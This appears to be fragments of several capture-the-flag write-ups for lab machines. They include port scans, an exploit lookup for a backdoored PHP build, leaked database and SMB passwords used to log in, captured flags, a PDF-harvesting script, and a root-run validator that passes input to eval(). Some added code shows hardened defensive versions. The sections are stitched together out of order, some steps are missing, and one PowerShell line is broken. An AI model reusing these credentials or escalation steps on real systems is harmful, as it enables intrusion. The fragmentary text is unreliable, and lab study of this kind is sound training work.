```
Nmap scan report for 10.10.10.242
Host is up (0.36s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
Exploitation
Get the PHP version information
```
curl -I http://10.10.10.242/
HTTP/1.1 200 OK
Date: Thu, 05 Aug 2021 05:54:34 GMT
Server: Apache/2.4.41 (Ubuntu)
X-Powered-By: PHP/8.1.0-dev
Content-Type: text/html; charset=UTF-8
```
Searching turns up the relevant exploit
```
searchsploit php 8.1 dev
----------------------------------------------------------- ---------------------------------
 Exploit Title                                             |  Path
----------------------------------------------------------- ---------------------------------
PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution        | php/webapps/49933.py
----------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
```
```
Matching Defaults entries for james on knife:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife
```
```
Nmap scan report for 10.10.10.245
Host is up (0.28s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    gunicorn
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
```
```
Nmap scan report for 10.10.11.100
Host is up (0.25s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
```php
// TODO -> Implement login system with the database.
$dbserver = "localhost";
$dbname = "bounty";
$dbusername = "admin";
$dbpassword = "m19RoAU0hP41A1sTsq6K";
$testuser = "test";
```
Log in over SSH
```
ssh development@10.10.11.100
m19RoAU0hP41A1sTsq6K
```
```
cat /home/development/user.txt
96248cc10e05f03e3b63eb59adfd9d4c
```
Privilege escalation
```
cat /home/development/contract.txt
Hey team,

I'll be out of the office this week but please make sure that our contract with Skytrain Inc gets completed.

This has been our first job since the "rm -rf" incident and we can't mess this up. Whenever one of you gets on please have a look at the internal tool they sent over. There have been a handful of tickets submitted that have been failing validation and I need you to figure out why.

I set up the permissions for you to test this. Good luck.

-- John
```
Check sudo permissions
```
sudo -l
Matching Defaults entries for development on bountyhunter:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User development may run the following commands on bountyhunter:
    (root) NOPASSWD: /usr/bin/python3.8 /opt/skytrain_inc/ticketValidator.py
```
```python
def load_file(loc):
    # Not shown in the excerpt of ticketValidator.py above; a minimal stand-in
    # that simply opens the ticket file so the rest of the script runs.
    return open(loc, "r")


def evaluate(ticketFile):
    # Evaluates a ticket to check for irregularities.
    code_line = None
    for i, x in enumerate(ticketFile.readlines()):
        if i == 0:
            if not x.startswith("# Skytrain Inc"):
                return False
            continue
        if i == 1:
            if not x.startswith("## Ticket to "):
                return False
            print(f"Destination: {' '.join(x.strip().split(' ')[3:])}")
            continue

        if x.startswith("__Ticket Code:__"):
            code_line = i + 1
            continue

        if code_line and i == code_line:
            if not x.startswith("**"):
                return False
            ticketCode = x.replace("**", "").split("+")[0]
            if int(ticketCode) % 7 == 4:
                # The whole code line is handed to eval() as a Python expression.
                validationNumber = eval(x.replace("**", ""))
                if validationNumber > 100:
                    return True
                else:
                    return False
    return False


def main():
    fileName = input("Please enter the path to the ticket file.\n")
    ticket = load_file(fileName)
    # DEBUG print(ticket)
    result = evaluate(ticket)
    if result:
        print("Valid ticket.")
    else:
        print("Invalid ticket.")
    ticket.close()


if __name__ == "__main__":
    main()
```
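The validator above passes the ticket-code line, which comes straight from a user-supplied file, to `eval()`, and the sudo rule runs the script as root. The risk is that `eval()` accepts any Python expression, not just a sum of integers. The hardened version below is an added example (it is not the box's `ticketValidator.py` and the ticket contents are constructed): it keeps the same ticket rules (header line, `## Ticket to` line, `__Ticket Code:__` marker, code `% 7 == 4`, sum above 100) but computes the sum by walking the `ast` and accepting only integer literals joined by `+`, so a line that contains anything else is rejected instead of executed.

```python
import ast

# Added example: a ticket validator that never calls eval().


def safe_sum(expr):
    """Return the value of expr if it is only integer literals joined by '+'.

    Any other syntax (names, calls, attributes, other operators) raises
    ValueError, so the caller can treat the ticket as invalid.
    """
    try:
        tree = ast.parse(expr.strip(), mode="eval")
    except SyntaxError as exc:
        raise ValueError(f"not an arithmetic expression: {expr!r}") from exc

    def walk(node):
        if isinstance(node, ast.Constant) and type(node.value) is int:
            return node.value
        if isinstance(node, ast.BinOp) and isinstance(node.op, ast.Add):
            return walk(node.left) + walk(node.right)
        raise ValueError(f"disallowed syntax in ticket code: {type(node).__name__}")

    return walk(tree.body)


def evaluate_lines(lines):
    """Apply the original ticket rules to a list of lines, without eval()."""
    code_line = None
    for i, x in enumerate(lines):
        if i == 0:
            if not x.startswith("# Skytrain Inc"):
                return False
            continue
        if i == 1:
            if not x.startswith("## Ticket to "):
                return False
            continue
        if x.startswith("__Ticket Code:__"):
            code_line = i + 1
            continue
        if code_line and i == code_line:
            if not x.startswith("**"):
                return False
            body = x.replace("**", "")
            ticket_code = body.split("+")[0].strip()
            # The original called int() on this directly; a non-numeric code
            # would raise instead of being reported as invalid.
            if not ticket_code.isdigit():
                return False
            if int(ticket_code) % 7 == 4:
                try:
                    validation_number = safe_sum(body)
                except ValueError:
                    return False
                return validation_number > 100
    return False


# Constructed sample tickets (not taken from the box).
GOOD_TICKET = [
    "# Skytrain Inc\n",
    "## Ticket to Bridgeport\n",
    "__Ticket Code:__\n",
    "**11+95+10**\n",
]
# Same ticket, but the code line is an expression rather than a plain sum.
NOT_A_SUM_TICKET = GOOD_TICKET[:3] + ["**11+abs(100)**\n"]


def run_demo():
    return {
        "good": evaluate_lines(GOOD_TICKET),
        "not_a_sum": evaluate_lines(NOT_A_SUM_TICKET),
    }


if __name__ == "__main__":
    print(run_demo())  # {'good': True, 'not_a_sum': False}
```

`ast.parse(..., mode="eval")` only parses; nothing is executed until the walker has confirmed every node is an `int` constant or an `Add`. Restricting to `ast.Add` also keeps the `split("+")[0]` ticket-code extraction consistent with what is actually summed.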
```
Nmap scan report for 10.10.10.248
Host is up (0.21s latency).
Not shown: 988 filtered ports
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-07-18 12:54:48Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
```
Exploitation
Visiting port 80, the home page links to two PDFs.
Try enumerating other PDFs
```python
#pdf.py
import requests

# The two linked documents follow a YYYY-MM-DD-upload.pdf naming scheme,
# so try every date from 2020 to 2022 and save whatever exists.
req = requests.Session()
for i in range(3):
    for j in range(1, 13):
        for k in range(31):
            year = str(2020 + i)
            month = ("0" + str(j)) if len(str(j)) == 1 else str(j)
            day = ("0" + str(k)) if len(str(k)) == 1 else str(k)
            url = "http://10.10.10.248/documents/" + year + "-" + month + "-" + day + "-upload.pdf"
            res = req.get(url)
            if res.status_code == 200:
                filename = year + "-" + month + "-" + day + "-upload.pdf"
                print(filename)
                with open(filename, "wb") as file:
                    file.write(res.content)
```
Get the usernames from the PDFs
```bash
#pdf.sh
# For every downloaded PDF, take the Creator field from exiftool's output
# ("Creator : Name", so the name is the third whitespace-separated field)
# and append it to the file ./user.
for f in *.pdf; do
    exiftool "$f" | grep '^Creator ' | awk '{print $3}' >> user
done
```
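The Creator field is the metadata that leaks the account names here, and the same check is worth running on the defending side before documents are published. The script below is an added example, not part of the original post: it reads the PDF Info dictionary directly (only the uncompressed `/Key (value)` form, which is what most office tooling writes) and flags fields whose value follows the `First.Last` naming convention seen in the `Users` share. The embedded PDF and the name `Jane.Doe` are constructed, not taken from the box.

```python
import re
import sys

# Added example: audit PDF metadata for values that look like account names.

# Constructed sample: a minimal uncompressed PDF whose Info dictionary carries
# a Creator in First.Last form (placeholder name, not from the box).
SAMPLE_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
    b"3 0 obj << /Creator (Jane.Doe) /Producer (Example PDF Writer) >> endobj\n"
    b"trailer << /Root 1 0 R /Info 3 0 R >>\n"
    b"%%EOF\n"
)

# Info-dictionary keys that commonly carry a person's or tool's name.
METADATA_KEYS = ("Creator", "Author", "Producer", "Title")

# The First.Last convention used for the accounts in this environment.
ACCOUNT_NAME_RE = re.compile(r"^[A-Za-z]+\.[A-Za-z]+$")


def extract_info_strings(pdf_bytes):
    """Return {key: value} for literal-string metadata entries found in pdf_bytes.

    Hex strings, object streams and XMP packets are not handled; for those,
    exiftool (as in pdf.sh above) remains the tool to use.
    """
    found = {}
    for key in METADATA_KEYS:
        match = re.search(rb"/" + key.encode() + rb"\s*\(([^)]*)\)", pdf_bytes)
        if match:
            found[key] = match.group(1).decode("latin-1")
    return found


def find_account_name_leaks(pdf_bytes):
    """Return only the metadata fields whose value matches ACCOUNT_NAME_RE."""
    return {
        key: value
        for key, value in extract_info_strings(pdf_bytes).items()
        if ACCOUNT_NAME_RE.match(value)
    }


def audit_files(paths):
    """Map each path to the leaking fields found in that file."""
    report = {}
    for path in paths:
        with open(path, "rb") as fh:
            report[path] = find_account_name_leaks(fh.read())
    return report


if __name__ == "__main__":
    if len(sys.argv) > 1:
        for path, leaks in audit_files(sys.argv[1:]).items():
            print(path, leaks or "no account-name metadata")
    else:
        # No files given: run against the constructed sample.
        print("sample:", find_account_name_leaks(SAMPLE_PDF))  # {'Creator': 'Jane.Doe'}
```

Run it as `python3 audit.py *.pdf` over a release directory; any non-empty result is a document whose metadata should be stripped (for example with `exiftool -all=`) before it goes on a public web server.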
```
Disk        Permissions  Comment
----        -----------  -------
ADMIN$      NO ACCESS    Remote Admin
C$          NO ACCESS    Default share
IPC$        READ ONLY    Remote IPC
IT          READ ONLY
NETLOGON    READ ONLY    Logon server share
SYSVOL      READ ONLY    Logon server share
Users       READ ONLY
```
Get user.txt
```
smbclient //10.10.10.248/users -U Tiffany.Molina NewIntelligenceCorpUser9876
cd Tiffany.Molina\Desktop\
get user.txt
```
```
cat user.txt
bbfd0948d53d769c6ec2fcc02181fa7b
```
Privilege escalation
Retrieve the PowerShell script
```
smbclient //10.10.10.248/IT -U Tiffany.Molina NewIntelligenceCorpUser9876
get downdetector.ps1
```
```powershell
cat downdetector.ps1
# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*") {
try {
$request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
if(.StatusCode -ne 200) {
Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
}
} catch {}
}
```